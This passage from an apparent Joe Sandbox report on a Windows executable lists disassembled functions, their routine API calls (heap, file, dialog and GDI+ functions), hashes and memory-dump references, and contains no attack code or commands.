                                                                                              • Instruction ID: 35b17abeb430633016cea1836d1050048241a31d588b83d03dadb34ab0b5e863
                                                                                              • Opcode Fuzzy Hash: 7982c693b4f60c546587196a2bfedf3949d07e5d5ea104631b8ef1562079b290
                                                                                              • Instruction Fuzzy Hash: 64014471D00268A5DF23ABA4ED0AEDF73FCAF08740F044465F605E7195E7B896848B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033A6A4 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0033A6C5
                                                                                                • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,003530C4,0031187A,?,?,00000007,?,?,?,003113F2,?,00000000), ref: 0033A701
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: f7c77c14ade51af60c2bde8671c3b7ba70a4a32387a311ab8d3f12373dd194e5
                                                                                              • Instruction ID: 0c7cd854db02483054246433481e3ea61aa97c16908e87296eeb9b3cf58b5550
                                                                                              • Opcode Fuzzy Hash: f7c77c14ade51af60c2bde8671c3b7ba70a4a32387a311ab8d3f12373dd194e5
                                                                                              • Instruction Fuzzy Hash: BFF0FC31101D10A7C7232B255CC3F5B375C9FC1BB0F1A4115F8956A0A1EF20DC409667
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003223BD Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 003223CA
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 003223D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 17557415342a801f163e3c044f17f4b14e82097e012830bcc23c1630baf73315
                                                                                              • Instruction ID: b3667ee0d6371cd3adb15b313cc84bbcc71f4c2d23a73891c2d6db2ff21584fc
                                                                                              • Opcode Fuzzy Hash: 17557415342a801f163e3c044f17f4b14e82097e012830bcc23c1630baf73315
                                                                                              • Instruction Fuzzy Hash: D1E09A3AB10125BB8F1ACBA4BC059EBB2ECEA44304721817AA603E3100E978ED0546A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
                                                                                                • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 9f7019a6b07dc1ca71ce1daef8d885fc694ef9ff762c3b34fa123465671a8f7b
                                                                                              • Instruction ID: 55e7b044e9ee92093d071dff71a3d4ab5c16e06a8a964c0bbad0ee442e7a4dfe
                                                                                              • Opcode Fuzzy Hash: 9f7019a6b07dc1ca71ce1daef8d885fc694ef9ff762c3b34fa123465671a8f7b
                                                                                              • Instruction Fuzzy Hash: 8EF0A935144209BBDF129FA0CC00BDA77ACBF083C5F008060BA44DA164DB31EDA5DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,00000000,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B481
                                                                                                • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B4AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: 70cabd26ac691047648a01c9b156f54ea9d896796e77da20f877364df5137de5
                                                                                              • Instruction ID: 5b7145edb6cc117108e5b14871c54aa23feb6615c8aa65c6e762e4406ee1634a
                                                                                              • Opcode Fuzzy Hash: 70cabd26ac691047648a01c9b156f54ea9d896796e77da20f877364df5137de5
                                                                                              • Instruction Fuzzy Hash: 5BE022361402086BEB025B60CC00FDA736CBF08382F048030BA04CA091DF20ECD4DA10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BD81 Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,0034380F,000000FF), ref: 0032BDB5
                                                                                              • OleUninitialize.OLE32(?,?,?,?,0034380F,000000FF), ref: 0032BDBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 3af36da0c9c33952fdd6f2592b115cd888219634328a8e3134b6d7c10bf9ad71
                                                                                              • Instruction ID: df09d55252e5d3af66f2d98a65e7e14456b87c46c5db75b1b04007178ee85bfd
                                                                                              • Opcode Fuzzy Hash: 3af36da0c9c33952fdd6f2592b115cd888219634328a8e3134b6d7c10bf9ad71
                                                                                              • Instruction Fuzzy Hash: 30E03072504A50AFC7129B49DC05B49FBBDFB89B20F108226B41597760CB747801CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F002 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0032F02C
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0032F043
                                                                                                • Part of subcall function 0032C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
                                                                                                • Part of subcall function 0032C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
                                                                                                • Part of subcall function 0032C758: IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
                                                                                                • Part of subcall function 0032C758: TranslateMessage.USER32(?), ref: 0032C79C
                                                                                                • Part of subcall function 0032C758: DispatchMessageW.USER32(?), ref: 0032C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: 8fe3a6bba0671e86a0151abe5f1f4fbdec39130064ef14eb2570f3b1d245252f
                                                                                              • Instruction ID: 38939610cb5f99206a51fbde6b3a79f5cf696b540f2b5304b51af28232f56f61
                                                                                              • Opcode Fuzzy Hash: 8fe3a6bba0671e86a0151abe5f1f4fbdec39130064ef14eb2570f3b1d245252f
                                                                                              • Instruction Fuzzy Hash: 09E02BB14143483ADF036761DC0AFEE366C5F083CAF040061B2009A0B2D6B485509B62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0031B4CA,?,00318042,?), ref: 0031B4E4
                                                                                                • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,0031B4CA,?,00318042,?), ref: 0031B510
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 629c62e57f80bb3f250167fb34f67d1b8daa5701398ee4d7864e1149963196a2
                                                                                              • Instruction ID: b0e9eeedf6fb973a9dedb65204111f7f93edd8a4a7a167d2fb61a2a2905516eb
                                                                                              • Opcode Fuzzy Hash: 629c62e57f80bb3f250167fb34f67d1b8daa5701398ee4d7864e1149963196a2
                                                                                              • Instruction Fuzzy Hash: 0AE0D8355402287BCB22AB64DC04BD9B76DAB0E3E1F010170FE45E71A5DB70AD80CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00321B3B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: 7271c2acc1510baf508d1d122f7d1a7a2ae1b690c0f3247249a727a23085a83c
                                                                                              • Instruction ID: 7c089b1e3a586191de6f4d64d1247942cef2f69923e74b294ed6fc0ec01e5a35
                                                                                              • Opcode Fuzzy Hash: 7271c2acc1510baf508d1d122f7d1a7a2ae1b690c0f3247249a727a23085a83c
                                                                                              • Instruction Fuzzy Hash: 8AE048775001286ADB1297A4DD05FDA776CEF1D7C1F0400757645E6004DA74EA84CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032B3C8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0032B3E9
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0032B3F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: d87e637daed3fafcc2c4a7936a3f3b69ae89bba4784c08ff003c0c303875a481
                                                                                              • Instruction ID: 5176885e29d2cb008b97f10765d6ba7d13bd0b0e5411c733f69a82a0ea40d117
                                                                                              • Opcode Fuzzy Hash: d87e637daed3fafcc2c4a7936a3f3b69ae89bba4784c08ff003c0c303875a481
                                                                                              • Instruction Fuzzy Hash: 09E01275900228EFDB21DF99D54179DB7F8EF04350F20807EE99597601D374AE449B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00333D1C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00333D3A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00333D45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: 1d17ecdf922360ed3ebaf766614473f0181f1b30b37c490383e7a5680b2850cb
                                                                                              • Instruction ID: 0eb2e0e423b27e3d160355d8f689fc9f549bf99f7a20fb957b83bd4e32e5a4f0
                                                                                              • Opcode Fuzzy Hash: 1d17ecdf922360ed3ebaf766614473f0181f1b30b37c490383e7a5680b2850cb
                                                                                              • Instruction Fuzzy Hash: DBD02236448702148C1B33782CC38995348A811B71FE1E746E0309E4E2EF18E6806022
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003112D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 6993618426fa66f240d95209d40ec45346f9fd7bf31bce7c3654913893fbbcba
                                                                                              • Instruction ID: 696344d3e2885b47f6512fa6ace8ef72347f9f9236a567bad206f50ce49fcd03
                                                                                              • Opcode Fuzzy Hash: 6993618426fa66f240d95209d40ec45346f9fd7bf31bce7c3654913893fbbcba
                                                                                              • Instruction Fuzzy Hash: FFC01232458500BECF120B70DC09D2A7BECAB94312F50C918F0A9C1060C279C050DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003112B3 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 003112C1
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 003112C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                              • String ID:
                                                                                              • API String ID: 4250310104-0
                                                                                              • Opcode ID: 10400d367a25365db2aeed6964693a08bc632be6edfbff43f0a07d031b95f1e0
                                                                                              • Instruction ID: 1224b443c0039c8ba9727fa6bbec9354b08527e3f2b9b64947b3af834258242b
                                                                                              • Opcode Fuzzy Hash: 10400d367a25365db2aeed6964693a08bc632be6edfbff43f0a07d031b95f1e0
                                                                                              • Instruction Fuzzy Hash: 3DC04C76408640BFCF165BB49D0CD2FBFBDAB94312F90CD1DB1A981020C6758450DF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00311AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 907964f9e5adb1575e764a17139ecd6de61234b919642915e3431c6804d567ce
                                                                                              • Instruction ID: 49f4e60e9b1332288f71a4ba12d87d524240f282be6fbf653e9ab35424b8d1ef
                                                                                              • Opcode Fuzzy Hash: 907964f9e5adb1575e764a17139ecd6de61234b919642915e3431c6804d567ce
                                                                                              • Instruction Fuzzy Hash: 6EC1A474A002549BDF2ACF68C4847ED7BA59F4E310F1905B9ED059F396CB709AC4CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00316DEF Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID:
                                                                                              • API String ID: 4218353326-0
                                                                                              • Opcode ID: 941bfae615688ee32bbd6900b3b070fa22ea946234ba2437a9a814970aadf6c0
                                                                                              • Instruction ID: faae23804e082260a7337c4050a03e9eea8c6a280859d14f4ce22a7eea4f6c54
                                                                                              • Opcode Fuzzy Hash: 941bfae615688ee32bbd6900b3b070fa22ea946234ba2437a9a814970aadf6c0
                                                                                              • Instruction Fuzzy Hash: CD51B973504358ABD726AAA0DC81FDBB3ECFF48304F04492AF699D7142EA31E55987A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003142F1 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
